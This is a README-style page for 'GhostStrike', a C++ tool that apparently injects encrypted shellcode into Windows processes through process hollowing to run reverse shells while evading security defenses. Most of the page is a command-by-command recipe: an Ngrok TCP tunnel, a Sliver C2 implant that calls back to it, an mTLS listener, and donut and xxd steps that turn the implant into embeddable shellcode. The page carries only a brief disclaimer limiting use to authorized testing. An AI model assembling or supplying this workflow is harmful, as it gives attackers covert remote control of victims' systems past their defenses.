GhostStrike is a stealthy C++ tool that deploys encrypted reverse shells via advanced process hollowing techniques to evade detection during Red Team operations.
Deploy stealthy reverse shells using advanced process hollowing with GhostStrike – a C++ tool for ethical hacking and Red Team operations.
GhostStrike is primarily used by ethical hackers and Red Team professionals to covertly execute reverse shells on Windows systems while bypassing security defenses. It enables penetration testers to simulate sophisticated attacks by injecting encrypted shellcode into legitimate processes, thereby assessing an organization's detection and response capabilities.
GhostStrike is intended strictly for educational and authorized penetration testing environments; unauthorized use is prohibited. Users should ensure compliance with legal and ethical guidelines before deployment. The tool requires basic familiarity with C++ compilation and Red Team infrastructure setup, including Ngrok and Sliver C2 frameworks.
Use any modern C++ compiler such as g++, clang++, or Visual Studio to compile the source code
No additional dependencies are required
Simply compile the source code with your preferred C++ compilerngrok tcp 443
Create an Ngrok TCP tunnel to expose a local port for remote connections
generate --mtls x.tcp.ngrok.io --save YourFile.exe
Generate a Sliver C2 implant executable configured to connect to the specified Ngrok endpoint
mtls --lhost 0.0.0.0 --lport 443
Create a listener on all interfaces at port 443 to receive incoming connections
./donut -i /home/YourUser/YourFile.exe -a 2 -f 1 -o /home/YourUser/YourFile.bin
Convert the generated executable into a binary shellcode format
xxd -i YourFile.bin > YourFile.h
Convert the binary shellcode into a C++ header file for inclusion in the GhostStrike source code
Import YourFile.h to this code
Include the generated shellcode header file into the GhostStrike project source
Compile and enjoy! 🚀
Compile the modified GhostStrike source code to produce the final executable